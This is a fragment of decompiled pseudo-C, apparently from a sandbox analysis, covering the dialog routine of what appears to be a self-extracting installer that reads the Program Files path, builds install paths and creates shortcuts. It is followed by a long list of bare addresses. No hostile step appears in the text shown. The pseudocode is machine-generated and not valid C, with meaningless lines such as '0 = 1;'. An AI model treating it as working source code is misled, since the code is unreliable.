                                                                                                                                                  									if( *(__ebp + 0x10) == 0) {
                                                                                                                                                  										__eax =  *0x41a81c;
                                                                                                                                                  										__eflags =  *0x41a81c;
                                                                                                                                                  										__ebx = __ebx & 0xffffff00 |  *0x41a81c == 0x00000000;
                                                                                                                                                  										__eflags = __bl;
                                                                                                                                                  										if(__bl == 0) {
                                                                                                                                                  											__eax = E0040A5E2(__eax, "<br>");
                                                                                                                                                  										}
                                                                                                                                                  										L31:
                                                                                                                                                  										__eflags =  *((char*)(__ebp - 5));
                                                                                                                                                  										if(__eflags == 0) {
                                                                                                                                                  											__esi = __ebp + 0xc;
                                                                                                                                                  											__edi = E0040B7BA(__ebp + 0xc, __eflags);
                                                                                                                                                  										} else {
                                                                                                                                                  											__edi = __ebp - 0x1c34;
                                                                                                                                                  										}
                                                                                                                                                  										__eflags = __bl;
                                                                                                                                                  										if(__bl == 0) {
                                                                                                                                                  											__esi = E0040A384(__ecx,  *0x41a81c);
                                                                                                                                                  										} else {
                                                                                                                                                  											__esi = 0;
                                                                                                                                                  										}
                                                                                                                                                  										E0040A384(__ecx, __edi) = __eax + __esi + 5;
                                                                                                                                                  										__eax = E0040A224( *0x41a81c, __eax);
                                                                                                                                                  										 *0x41a81c = __eax;
                                                                                                                                                  										__eflags = __bl;
                                                                                                                                                  										if(__bl != 0) {
                                                                                                                                                  											 *__eax = 0;
                                                                                                                                                  										}
                                                                                                                                                  										L39:
                                                                                                                                                  										__eax = E0040A5E2(__eax, __edi);
                                                                                                                                                  										__eflags =  *((char*)(__ebp - 5));
                                                                                                                                                  										if( *((char*)(__ebp - 5)) == 0) {
                                                                                                                                                  											__eax = E0040A205(__edi);
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									goto L152;
                                                                                                                                                  								case 2:
                                                                                                                                                  									L41:
                                                                                                                                                  									__eflags =  *(__ebp + 0x10);
                                                                                                                                                  									if( *(__ebp + 0x10) == 0) {
                                                                                                                                                  										__ebp - 0x1c34 = SetWindowTextA( *(__ebp + 8), __ebp - 0x1c34); // executed
                                                                                                                                                  									}
                                                                                                                                                  									goto L152;
                                                                                                                                                  								case 3:
                                                                                                                                                  									L43:
                                                                                                                                                  									__eflags =  *(__ebp + 0x10);
                                                                                                                                                  									if( *(__ebp + 0x10) != 0) {
                                                                                                                                                  										goto L152;
                                                                                                                                                  									}
                                                                                                                                                  									L44:
                                                                                                                                                  									__eflags =  *0x419f92;
                                                                                                                                                  									if( *0x419f92 != 0) {
                                                                                                                                                  										goto L152;
                                                                                                                                                  									}
                                                                                                                                                  									L45:
                                                                                                                                                  									__eflags =  *(__ebp - 0x1c34) - 0x22;
                                                                                                                                                  									__esi = __ebp - 0x1c34;
                                                                                                                                                  									 *(__ebp - 0x434) = 0;
                                                                                                                                                  									if( *(__ebp - 0x1c34) == 0x22) {
                                                                                                                                                  										__esi = __ebp - 0x1c33;
                                                                                                                                                  									}
                                                                                                                                                  									__eax = E0040A384(__ecx, __esi);
                                                                                                                                                  									__eflags = __eax - 0x400;
                                                                                                                                                  									if(__eax >= 0x400) {
                                                                                                                                                  										goto L152;
                                                                                                                                                  									} else {
                                                                                                                                                  										L48:
                                                                                                                                                  										__al = __esi->i;
                                                                                                                                                  										__eflags = __al - 0x2e;
                                                                                                                                                  										if(__al != 0x2e) {
                                                                                                                                                  											L57:
                                                                                                                                                  											__eflags = __al - 0x5c;
                                                                                                                                                  											if(__al == 0x5c) {
                                                                                                                                                  												L51:
                                                                                                                                                  												__ebp - 0x434 = E0040A477(__ebp - 0x434, __esi);
                                                                                                                                                  												L52:
                                                                                                                                                  												__eax = __ebp - 0x434;
                                                                                                                                                  												__eax = E0040A3D9(__ecx, __ebp - 0x434, 0x22);
                                                                                                                                                  												__eflags = __eax;
                                                                                                                                                  												if(__eax != 0) {
                                                                                                                                                  													__eflags =  *((char*)(__eax + 1));
                                                                                                                                                  													if( *((char*)(__eax + 1)) == 0) {
                                                                                                                                                  														 *__eax = 0;
                                                                                                                                                  													}
                                                                                                                                                  												}
                                                                                                                                                  												__ebp - 0x434 = E0040A477(__ebx, __ebp - 0x434);
                                                                                                                                                  												__ebp - 0x434 = E0040B9B0(__esi, __ebp - 0x434); // executed
                                                                                                                                                  												__esi = GetDlgItem( *(__ebp + 8), 0x65);
                                                                                                                                                  												__ebp - 0x434 = SetWindowTextA(__esi, __ebp - 0x434); // executed
                                                                                                                                                  												__eax = SendMessageA(__esi, 0x143, 0, __ebx); // executed
                                                                                                                                                  												__eax = __ebp - 0x434;
                                                                                                                                                  												__eax = E0040A4E9(__ebx, __ebp - 0x434);
                                                                                                                                                  												__eflags = __eax;
                                                                                                                                                  												if(__eax != 0) {
                                                                                                                                                  													__ebp - 0x434 = SendMessageA(__esi, 0x143, 0, __ebp - 0x434);
                                                                                                                                                  												}
                                                                                                                                                  												goto L152;
                                                                                                                                                  											}
                                                                                                                                                  											L58:
                                                                                                                                                  											__eflags = __al;
                                                                                                                                                  											if(__al == 0) {
                                                                                                                                                  												L60:
                                                                                                                                                  												__eax = __ebp - 0x10;
                                                                                                                                                  												__eax = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1, __ebp - 0x10);
                                                                                                                                                  												__eflags = __eax;
                                                                                                                                                  												if(__eax == 0) {
                                                                                                                                                  													__ebp - 0xc = __ebp - 0x434;
                                                                                                                                                  													__eax = __ebp - 0x14;
                                                                                                                                                  													 *(__ebp - 0xc) = 0x400;
                                                                                                                                                  													RegQueryValueExA( *(__ebp - 0x10), "ProgramFilesDir", 0, __ebp - 0x14, __ebp - 0x434, __ebp - 0xc) = RegCloseKey( *(__ebp - 0x10));
                                                                                                                                                  												}
                                                                                                                                                  												__eflags =  *(__ebp - 0x434);
                                                                                                                                                  												if( *(__ebp - 0x434) != 0) {
                                                                                                                                                  													__eax = __ebp - 0x434;
                                                                                                                                                  													__eax = E0040A384(__ecx, __ebp - 0x434);
                                                                                                                                                  													__ecx = __ebp - 0x434;
                                                                                                                                                  													__ecx = __ebp - 0x433;
                                                                                                                                                  													__eflags =  *((char*)(__eax + __ecx)) - 0x5c;
                                                                                                                                                  													if( *((char*)(__eax + __ecx)) != 0x5c) {
                                                                                                                                                  														__ebp - 0x434 = E0040A5E2(__ebp - 0x434, "\\");
                                                                                                                                                  													}
                                                                                                                                                  												}
                                                                                                                                                  												__edi = E0040A384(__ecx, __esi);
                                                                                                                                                  												__eax = __ebp - 0x434;
                                                                                                                                                  												__edi = __edi + E0040A384(__ecx, __ebp - 0x434);
                                                                                                                                                  												__eflags = __edi - 0x3ff;
                                                                                                                                                  												if(__edi < 0x3ff) {
                                                                                                                                                  													__ebp - 0x434 = E0040A5E2(__ebp - 0x434, __esi);
                                                                                                                                                  												}
                                                                                                                                                  												goto L52;
                                                                                                                                                  											}
                                                                                                                                                  											L59:
                                                                                                                                                  											__eflags = __esi->i - 0x3a;
                                                                                                                                                  											if(__esi->i == 0x3a) {
                                                                                                                                                  												goto L51;
                                                                                                                                                  											}
                                                                                                                                                  											goto L60;
                                                                                                                                                  										}
                                                                                                                                                  										L49:
                                                                                                                                                  										__eflags = __esi->i - 0x5c;
                                                                                                                                                  										if(__esi->i != 0x5c) {
                                                                                                                                                  											goto L57;
                                                                                                                                                  										}
                                                                                                                                                  										L50:
                                                                                                                                                  										__esi =  &(__esi->i);
                                                                                                                                                  										__eflags = __esi;
                                                                                                                                                  										goto L51;
                                                                                                                                                  									}
                                                                                                                                                  								case 4:
                                                                                                                                                  									L67:
                                                                                                                                                  									__eflags =  *0x419f8c - 1;
                                                                                                                                                  									__eflags = __eax - 0x419f8c;
                                                                                                                                                  									 *__edi =  *__edi + __ecx;
                                                                                                                                                  									__eflags =  *(__ebp + 5) & __cl;
                                                                                                                                                  									 *__eax =  *__eax + __al;
                                                                                                                                                  									__eflags =  *__eax;
                                                                                                                                                  								case 5:
                                                                                                                                                  									L72:
                                                                                                                                                  									__eax =  *(__ebp - 0x1c34);
                                                                                                                                                  									__eax =  *(__ebp - 0x1c34);
                                                                                                                                                  									__eflags = __eax;
                                                                                                                                                  									if(__eax == 0) {
                                                                                                                                                  										L79:
                                                                                                                                                  										 *0x419edf = 0;
                                                                                                                                                  										 *0x419ede = 1;
                                                                                                                                                  										goto L152;
                                                                                                                                                  									}
                                                                                                                                                  									L73:
                                                                                                                                                  									__eax = __eax - 0x30;
                                                                                                                                                  									__eflags = __eax;
                                                                                                                                                  									if(__eax == 0) {
                                                                                                                                                  										L77:
                                                                                                                                                  										 *0x419edf = 0;
                                                                                                                                                  										L78:
                                                                                                                                                  										 *0x419ede = 0;
                                                                                                                                                  										goto L152;
                                                                                                                                                  									}
                                                                                                                                                  									L74:
                                                                                                                                                  									__eax = __eax - 1;
                                                                                                                                                  									__eflags = __eax;
                                                                                                                                                  									if(__eax == 0) {
                                                                                                                                                  										goto L79;
                                                                                                                                                  									}
                                                                                                                                                  									L75:
                                                                                                                                                  									__eax = __eax - 1;
                                                                                                                                                  									__eflags = __eax;
                                                                                                                                                  									if(__eax != 0) {
                                                                                                                                                  										goto L152;
                                                                                                                                                  									}
                                                                                                                                                  									L76:
                                                                                                                                                  									 *0x419edf = 1;
                                                                                                                                                  									goto L78;
                                                                                                                                                  								case 6:
                                                                                                                                                  									L85:
                                                                                                                                                  									__eflags =  *(__ebp + 0x10) - 4;
                                                                                                                                                  									if( *(__ebp + 0x10) != 4) {
                                                                                                                                                  										goto L152;
                                                                                                                                                  									}
                                                                                                                                                  									L86:
                                                                                                                                                  									_push(0);
                                                                                                                                                  									goto L87;
                                                                                                                                                  								case 7:
                                                                                                                                                  									goto L0;
                                                                                                                                                  								case 8:
                                                                                                                                                  									L107:
                                                                                                                                                  									__eflags =  *(__ebp + 0x10) - 3;
                                                                                                                                                  									if( *(__ebp + 0x10) == 3) {
                                                                                                                                                  										__eflags =  *(__ebp - 0x1c34);
                                                                                                                                                  										if(__eflags != 0) {
                                                                                                                                                  											__ebp - 0x1c34 = SetWindowTextA( *(__ebp + 8), __ebp - 0x1c34);
                                                                                                                                                  										}
                                                                                                                                                  										__esi = __ebp + 0xc;
                                                                                                                                                  										 *0x41a820 = E0040B7BA(__esi, __eflags);
                                                                                                                                                  									}
                                                                                                                                                  									 *0x41a817 = 1;
                                                                                                                                                  									goto L152;
                                                                                                                                                  								case 9:
                                                                                                                                                  									L112:
                                                                                                                                                  									__eflags =  *(__ebp + 0x10) - 5;
                                                                                                                                                  									if( *(__ebp + 0x10) != 5) {
                                                                                                                                                  										goto L152;
                                                                                                                                                  									}
                                                                                                                                                  									L113:
                                                                                                                                                  									_push(1);
                                                                                                                                                  									L87:
                                                                                                                                                  									__ebp - 0x1c34 = E0040BD80(__ebp - 0x1c34, __ecx); // executed
                                                                                                                                                  									goto L152;
                                                                                                                                                  								case 0xa:
                                                                                                                                                  									L114:
                                                                                                                                                  									__eflags =  *(__ebp + 0x10) - 6;
                                                                                                                                                  									if( *(__ebp + 0x10) != 6) {
                                                                                                                                                  										goto L152;
                                                                                                                                                  									}
                                                                                                                                                  									L115:
                                                                                                                                                  									__eax =  *((char*)(__ebp - 0xb4dc));
                                                                                                                                                  									__eax = E0040A250(__ecx,  *((char*)(__ebp - 0xb4dc)));
                                                                                                                                                  									__eax = __eax - 0x50;
                                                                                                                                                  									__eflags = __eax;
                                                                                                                                                  									if(__eax == 0) {
                                                                                                                                                  										 *(__ebp - 4) = 2;
                                                                                                                                                  									} else {
                                                                                                                                                  										__eax = __eax - 3;
                                                                                                                                                  										__eflags = __eax;
                                                                                                                                                  										if(__eax == 0) {
                                                                                                                                                  											 *(__ebp - 4) = 0xb;
                                                                                                                                                  										} else {
                                                                                                                                                  											__eax = __eax - 1;
                                                                                                                                                  											__eflags = __eax;
                                                                                                                                                  											if(__eax == 0) {
                                                                                                                                                  												 *(__ebp - 4) = 7;
                                                                                                                                                  											} else {
                                                                                                                                                  												 *(__ebp - 4) = 0x10;
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									__ebp - 0xa4dc = __ebp - 0xc34;
                                                                                                                                                  									 *(__ebp - 0x2034) = 0;
                                                                                                                                                  									 *(__ebp - 0x834) = 0;
                                                                                                                                                  									__eax = E0040A477(__ebp - 0xc34, __ebp - 0xa4dc);
                                                                                                                                                  									__eflags =  *(__ebp - 0xc34) - 0x22;
                                                                                                                                                  									if(__eflags != 0) {
                                                                                                                                                  										L125:
                                                                                                                                                  										__ebp - 0xc34 = E00405767(__eflags, __ebp - 0xc34, 0);
                                                                                                                                                  										__eflags = __al;
                                                                                                                                                  										if(__al != 0) {
                                                                                                                                                  											goto L139;
                                                                                                                                                  										}
                                                                                                                                                  										L126:
                                                                                                                                                  										__edi = 0;
                                                                                                                                                  										__eflags =  *(__ebp - 0xc34);
                                                                                                                                                  										__esi = __ebp - 0xc34;
                                                                                                                                                  										if( *(__ebp - 0xc34) == 0) {
                                                                                                                                                  											goto L139;
                                                                                                                                                  										} else {
                                                                                                                                                  											goto L127;
                                                                                                                                                  										}
                                                                                                                                                  										do {
                                                                                                                                                  											L127:
                                                                                                                                                  											__bl = __esi->i;
                                                                                                                                                  											__eflags = __bl - 0x20;
                                                                                                                                                  											if(__eflags == 0) {
                                                                                                                                                  												L129:
                                                                                                                                                  												__eax = __ebp - 0xc34;
                                                                                                                                                  												__esi->i = 0;
                                                                                                                                                  												__eax = E00405767(__eflags, __ebp - 0xc34, 0);
                                                                                                                                                  												__eflags = __al;
                                                                                                                                                  												if(__al == 0) {
                                                                                                                                                  													L135:
                                                                                                                                                  													__esi->i = __bl;
                                                                                                                                                  													goto L136;
                                                                                                                                                  												}
                                                                                                                                                  												L130:
                                                                                                                                                  												__edi = __esi;
                                                                                                                                                  												__eflags = __bl - 0x2f;
                                                                                                                                                  												if(__bl != 0x2f) {
                                                                                                                                                  													do {
                                                                                                                                                  														L132:
                                                                                                                                                  														__esi =  &(__esi->i);
                                                                                                                                                  														__eflags = __esi->i - 0x20;
                                                                                                                                                  													} while (__esi->i == 0x20);
                                                                                                                                                  													_push(__esi);
                                                                                                                                                  													__eax = __ebp - 0x834;
                                                                                                                                                  													L134:
                                                                                                                                                  													_push(__eax);
                                                                                                                                                  													__eax = E0040A477();
                                                                                                                                                  													 *__edi = __bl;
                                                                                                                                                  													goto L136;
                                                                                                                                                  												}
                                                                                                                                                  												L131:
                                                                                                                                                  												_t185 =  &(__esi->i); // 0x1
                                                                                                                                                  												__eax = _t185;
                                                                                                                                                  												_push(_t185);
                                                                                                                                                  												 *(__ebp - 0x834) = __bl;
                                                                                                                                                  												__eax = __ebp - 0x833;
                                                                                                                                                  												goto L134;
                                                                                                                                                  											}
                                                                                                                                                  											L128:
                                                                                                                                                  											__eflags = __bl - 0x2f;
                                                                                                                                                  											if(__eflags != 0) {
                                                                                                                                                  												goto L136;
                                                                                                                                                  											}
                                                                                                                                                  											goto L129;
                                                                                                                                                  											L136:
                                                                                                                                                  											__esi =  &(__esi->i);
                                                                                                                                                  											__eflags = __esi->i;
                                                                                                                                                  										} while (__esi->i != 0);
                                                                                                                                                  										__eflags = __edi;
                                                                                                                                                  										if(__edi != 0) {
                                                                                                                                                  											 *__edi = 0;
                                                                                                                                                  										}
                                                                                                                                                  										goto L139;
                                                                                                                                                  									} else {
                                                                                                                                                  										L123:
                                                                                                                                                  										__ebp - 0xa4db = __ebp - 0xc34;
                                                                                                                                                  										E0040A477(__ebp - 0xc34, __ebp - 0xa4db) = __ebp - 0xc33;
                                                                                                                                                  										__eax = E004073AB(__ebp - 0xc33, 0x22);
                                                                                                                                                  										__eflags = __eax;
                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                  											 *__eax = 0;
                                                                                                                                                  											__ebp - 0x834 = E0040A477(__ebp - 0x834, __ebp - 0x834);
                                                                                                                                                  										}
                                                                                                                                                  										L139:
                                                                                                                                                  										__eflags =  *((char*)(__ebp - 0x64dc));
                                                                                                                                                  										if( *((char*)(__ebp - 0x64dc)) != 0) {
                                                                                                                                                  											__ebp - 0x2034 = __ebp - 0x64dc;
                                                                                                                                                  											__eax = E00405822(__ebp - 0x64dc, __ebp - 0x2034);
                                                                                                                                                  										}
                                                                                                                                                  										__ebp - 0x44dc = __ebp - 0xc34;
                                                                                                                                                  										E00405822(__ebp - 0xc34, __ebp - 0x44dc) = __ebp - 0x434;
                                                                                                                                                  										__eax = E0040AAC2(__ecx, __ebp - 0x434,  *(__ebp - 4)); // executed
                                                                                                                                                  										__ebp - 0x434 = E004076C8(__ebp - 0x434);
                                                                                                                                                  										__eflags =  *((char*)(__ebp - 0x94dc));
                                                                                                                                                  										if( *((char*)(__ebp - 0x94dc)) != 0) {
                                                                                                                                                  											__ebp - 0x94dc = __ebp - 0x434;
                                                                                                                                                  											E0040A5E2(__ebp - 0x434, __ebp - 0x94dc) = __ebp - 0x434;
                                                                                                                                                  											__eax = E004076C8(__ebp - 0x434);
                                                                                                                                                  										}
                                                                                                                                                  										__ebp - 0x434 = __ebp - 0x34d4;
                                                                                                                                                  										__eax = E0040A477(__ebp - 0x34d4, __ebp - 0x434);
                                                                                                                                                  										__eflags =  *(__ebp - 0x74dc);
                                                                                                                                                  										__eax = __ebp - 0x74dc;
                                                                                                                                                  										if( *(__ebp - 0x74dc) == 0) {
                                                                                                                                                  											__eax = __ebp - 0xa4dc;
                                                                                                                                                  										}
                                                                                                                                                  										__ebp - 0x434 = E0040A5E2(__ebp - 0x434, __ebp - 0x434);
                                                                                                                                                  										__eax = __ebp - 0x434;
                                                                                                                                                  										__eax = E00407690(__ebp - 0x434);
                                                                                                                                                  										__eflags = __eax;
                                                                                                                                                  										if(__eax == 0) {
                                                                                                                                                  											L147:
                                                                                                                                                  											__ebp - 0x434 = E0040A5E2(__ebp - 0x434, ".lnk");
                                                                                                                                                  											goto L148;
                                                                                                                                                  										} else {
                                                                                                                                                  											L146:
                                                                                                                                                  											__eax = E0040A59A(__eax, ".lnk");
                                                                                                                                                  											__eflags = __eax;
                                                                                                                                                  											if(__eax == 0) {
                                                                                                                                                  												L148:
                                                                                                                                                  												__ebp - 0x434 = E004058FF(__ebx, __esi, __ebp - 0x434, 0, 1); // executed
                                                                                                                                                  												 *(__ebp - 0x834) =  ~( *(__ebp - 0x834));
                                                                                                                                                  												asm("sbb eax, eax");
                                                                                                                                                  												__ecx = __ebp - 0x834;
                                                                                                                                                  												 ~( *(__ebp - 0x834)) & __ebp - 0x00000834 =  *(__ebp - 0x2034);
                                                                                                                                                  												__eax =  ~( *(__ebp - 0x2034));
                                                                                                                                                  												asm("sbb eax, eax");
                                                                                                                                                  												__ecx = __ebp - 0x2034;
                                                                                                                                                  												 ~( *(__ebp - 0x2034)) & __ebp - 0x00002034 =  *(__ebp - 0x84dc);
                                                                                                                                                  												__eax =  ~( *(__ebp - 0x84dc));
                                                                                                                                                  												asm("sbb eax, eax");
                                                                                                                                                  												__ecx = __ebp - 0x84dc;
                                                                                                                                                  												 ~( *(__ebp - 0x84dc)) & __ebp - 0x000084dc = __ebp - 0x434;
                                                                                                                                                  												__ebp - 0x44dc = E0040A9BD(__ebp - 0x44dc, __ebp - 0x434,  ~( *(__ebp - 0x84dc)) & __ebp - 0x000084dc,  ~( *(__ebp - 0x2034)) & __ebp - 0x00002034,  ~( *(__ebp - 0x834)) & __ebp - 0x00000834); // executed
                                                                                                                                                  												__eflags =  *(__ebp - 0x34d4);
                                                                                                                                                  												if( *(__ebp - 0x34d4) != 0) {
                                                                                                                                                  													__eax = __ebp - 0x34d4;
                                                                                                                                                  													SHChangeNotify(0x1000, 1, __ebp - 0x34d4, 0); // executed
                                                                                                                                                  												}
                                                                                                                                                  												goto L152;
                                                                                                                                                  											}
                                                                                                                                                  											goto L147;
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  								case 0xb:
                                                                                                                                                  									L150:
                                                                                                                                                  									__eflags =  *(__ebp + 0x10) - 7;
                                                                                                                                                  									if( *(__ebp + 0x10) == 7) {
                                                                                                                                                  										 *0x419f90 = 1;
                                                                                                                                                  									}
                                                                                                                                                  									goto L152;
                                                                                                                                                  								case 0xc:
                                                                                                                                                  									L80:
                                                                                                                                                  									__eax =  *(__ebp - 0x1c34);
                                                                                                                                                  									__eax = E0040A250(__ecx,  *(__ebp - 0x1c34));
                                                                                                                                                  									__eflags = __eax - 0x46;
                                                                                                                                                  									if(__eax == 0x46) {
                                                                                                                                                  										 *0x419edd = 1;
                                                                                                                                                  									} else {
                                                                                                                                                  										__eflags = __eax - 0x55;
                                                                                                                                                  										if(__eax == 0x55) {
                                                                                                                                                  											 *0x419edc = 1;
                                                                                                                                                  										} else {
                                                                                                                                                  											 *0x419edd = 0;
                                                                                                                                                  											 *0x419edc = 0;
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									goto L152;
                                                                                                                                                  							}
                                                                                                                                                  							L2:
                                                                                                                                                  							_t232 = E0040A925(_t232,  *(_t309 - 4));
                                                                                                                                                  							 *(_t309 - 4) =  *(_t309 - 4) + 0x1000;
                                                                                                                                                  							_t9 = _t309 - 0xc;
                                                                                                                                                  							 *_t9 =  *((intOrPtr*)(_t309 - 0xc)) - 1;
                                                                                                                                                  							if( *_t9 != 0) {
                                                                                                                                                  								goto L2;
                                                                                                                                                  							} else {
                                                                                                                                                  								 *(_t309 - 4) =  *(_t309 - 4) & 0x00000000;
                                                                                                                                                  								goto L4;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						L153:
                                                                                                                                                  						return _t231;
                                                                                                                                                  					}
                                                                                                                                                  					L92:
                                                                                                                                                  					if( *0x41a816 != 0) {
                                                                                                                                                  						goto L152;
                                                                                                                                                  					}
                                                                                                                                                  					L93:
                                                                                                                                                  					__eax = __ebp - 0x1c34;
                                                                                                                                                  					 *(__ebp - 0x234) = 0;
                                                                                                                                                  					__eax = E0040A3AD(__ebp - 0x1c34, 0x2c);
                                                                                                                                                  					if(__eax != 0) {
                                                                                                                                                  						L99:
                                                                                                                                                  						if( *(__ebp - 0x234) == 0) {
                                                                                                                                                  							__ebp - 0xb4dc = __ebp - 0x1c34;
                                                                                                                                                  							E0040A477(__ebp - 0x1c34, __ebp - 0xb4dc) = __ebp - 0xa4dc;
                                                                                                                                                  							__ebp - 0x234 = E0040A477(__ebp - 0x234, __ebp - 0xa4dc);
                                                                                                                                                  						}
                                                                                                                                                  						__ebp - 0x1c34 = E0040ABA1(__ebp - 0x1c34);
                                                                                                                                                  						__ebp - 0x234 = __ebp - 0x1c34;
                                                                                                                                                  						 *((char*)(__ebp - 0x1434)) = 0;
                                                                                                                                                  						__eax = MessageBoxA( *(__ebp + 8), __ebp - 0x1c34, __ebp - 0x234, 0x24);
                                                                                                                                                  						if(__eax == 6) {
                                                                                                                                                  							goto L152;
                                                                                                                                                  						} else {
                                                                                                                                                  							L102:
                                                                                                                                                  							0 = 1;
                                                                                                                                                  							 *0x41a815 = 1;
                                                                                                                                                  							 *0x419f78 = 1;
                                                                                                                                                  							__eax = EndDialog( *(__ebp + 8), 1);
                                                                                                                                                  							goto L103;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					L94:
                                                                                                                                                  					__esi = 0;
                                                                                                                                                  					if( *(__ebp - 0x1c34) == 0) {
                                                                                                                                                  						goto L99;
                                                                                                                                                  					} else {
                                                                                                                                                  						goto L95;
                                                                                                                                                  					}
                                                                                                                                                  					while(1) {
                                                                                                                                                  						L95:
                                                                                                                                                  						if( *((char*)(__ebp + __esi - 0x1c34)) == 0x40) {
                                                                                                                                                  							break;
                                                                                                                                                  						}
                                                                                                                                                  						L96:
                                                                                                                                                  						__esi =  &(__esi->i);
                                                                                                                                                  						if( *((char*)(__ebp + __esi - 0x1c34)) != 0) {
                                                                                                                                                  							continue;
                                                                                                                                                  						}
                                                                                                                                                  						L97:
                                                                                                                                                  						goto L99;
                                                                                                                                                  					}
                                                                                                                                                  					L98:
                                                                                                                                                  					__ebp + __esi - 0x1c33 = __ebp - 0x234;
                                                                                                                                                  					__eax = E0040A477(__ebp - 0x234, __ebp + __esi - 0x1c33);
                                                                                                                                                  					 *((char*)(__ebp + __esi - 0x1c34)) = 0;
                                                                                                                                                  					goto L99;
                                                                                                                                                  					L103:
                                                                                                                                                  					if( *((intOrPtr*)(_t309 + 0x10)) == 7) {
                                                                                                                                                  						if( *0x419f8c == 0) {
                                                                                                                                                  							 *0x419f8c = 2;
                                                                                                                                                  						}
                                                                                                                                                  						 *0x419f88 = 1;
                                                                                                                                                  					}
                                                                                                                                                  					goto L152;
                                                                                                                                                  				}
                                                                                                                                                  			}







                                                                                                                                                  0x0040c5b9
                                                                                                                                                  0x0040c5b9
                                                                                                                                                  0x0040c5b9
                                                                                                                                                  0x0040c5b9
                                                                                                                                                  0x0040c5bd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c5c3
                                                                                                                                                  0x0040c5cf
                                                                                                                                                  0x0040c5dc
                                                                                                                                                  0x0040c5e1
                                                                                                                                                  0x0040c5e5
                                                                                                                                                  0x0040c5e7
                                                                                                                                                  0x0040c5f4
                                                                                                                                                  0x0040c5f4
                                                                                                                                                  0x0040c5fa
                                                                                                                                                  0x0040c601
                                                                                                                                                  0x0040c609
                                                                                                                                                  0x0040c60b
                                                                                                                                                  0x0040c60e
                                                                                                                                                  0x0040c615
                                                                                                                                                  0x0040c61a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c5ee
                                                                                                                                                  0x0040c5ee
                                                                                                                                                  0x0040c5ee
                                                                                                                                                  0x0040c5f1
                                                                                                                                                  0x0040c5f1
                                                                                                                                                  0x0040c61c
                                                                                                                                                  0x0040c628
                                                                                                                                                  0x0040c635
                                                                                                                                                  0x0040ca2a
                                                                                                                                                  0x0040ca2a
                                                                                                                                                  0x0040ca48
                                                                                                                                                  0x0040ca4d
                                                                                                                                                  0x0040ca52
                                                                                                                                                  0x0040bfe1
                                                                                                                                                  0x0040bff8
                                                                                                                                                  0x0040bffe
                                                                                                                                                  0x0040c001
                                                                                                                                                  0x0040c001
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c021
                                                                                                                                                  0x0040c03c
                                                                                                                                                  0x0040c043
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c045
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c045
                                                                                                                                                  0x0040c043
                                                                                                                                                  0x0040c04e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c054
                                                                                                                                                  0x0040c057
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c05e
                                                                                                                                                  0x0040c05e
                                                                                                                                                  0x0040c062
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c068
                                                                                                                                                  0x0040c074
                                                                                                                                                  0x0040c088
                                                                                                                                                  0x0040c094
                                                                                                                                                  0x0040c0a7
                                                                                                                                                  0x0040c0b2
                                                                                                                                                  0x0040c0c4
                                                                                                                                                  0x0040c0cf
                                                                                                                                                  0x0040c0d4
                                                                                                                                                  0x0040c0dd
                                                                                                                                                  0x0040c0e3
                                                                                                                                                  0x0040c0e8
                                                                                                                                                  0x0040c0ea
                                                                                                                                                  0x0040c256
                                                                                                                                                  0x0040c25c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c0f0
                                                                                                                                                  0x0040c0f0
                                                                                                                                                  0x0040c0f5
                                                                                                                                                  0x0040c0f5
                                                                                                                                                  0x0040c0fe
                                                                                                                                                  0x0040c104
                                                                                                                                                  0x0040c10b
                                                                                                                                                  0x0040c1bb
                                                                                                                                                  0x0040c1c2
                                                                                                                                                  0x0040c1c4
                                                                                                                                                  0x0040c1c7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c1c9
                                                                                                                                                  0x0040c1d0
                                                                                                                                                  0x0040c1d6
                                                                                                                                                  0x0040c1d8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c1da
                                                                                                                                                  0x0040c1da
                                                                                                                                                  0x0040c1dd
                                                                                                                                                  0x0040c1de
                                                                                                                                                  0x0040c1e6
                                                                                                                                                  0x0040c1f5
                                                                                                                                                  0x0040c1f7
                                                                                                                                                  0x0040c201
                                                                                                                                                  0x0040c203
                                                                                                                                                  0x0040c206
                                                                                                                                                  0x0040c1e0
                                                                                                                                                  0x0040c1e0
                                                                                                                                                  0x0040c1e0
                                                                                                                                                  0x0040c1e3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c208
                                                                                                                                                  0x0040c216
                                                                                                                                                  0x0040c21c
                                                                                                                                                  0x0040c21e
                                                                                                                                                  0x0040c220
                                                                                                                                                  0x0040c225
                                                                                                                                                  0x0040c227
                                                                                                                                                  0x0040c234
                                                                                                                                                  0x0040c234
                                                                                                                                                  0x0040c227
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c21e
                                                                                                                                                  0x0040c206
                                                                                                                                                  0x0040c1d8
                                                                                                                                                  0x0040c111
                                                                                                                                                  0x0040c116
                                                                                                                                                  0x0040c119
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c11f
                                                                                                                                                  0x0040c12d
                                                                                                                                                  0x0040c139
                                                                                                                                                  0x0040c145
                                                                                                                                                  0x0040c14a
                                                                                                                                                  0x0040c14d
                                                                                                                                                  0x0040c150
                                                                                                                                                  0x0040c163
                                                                                                                                                  0x0040c16c
                                                                                                                                                  0x0040c171
                                                                                                                                                  0x0040c173
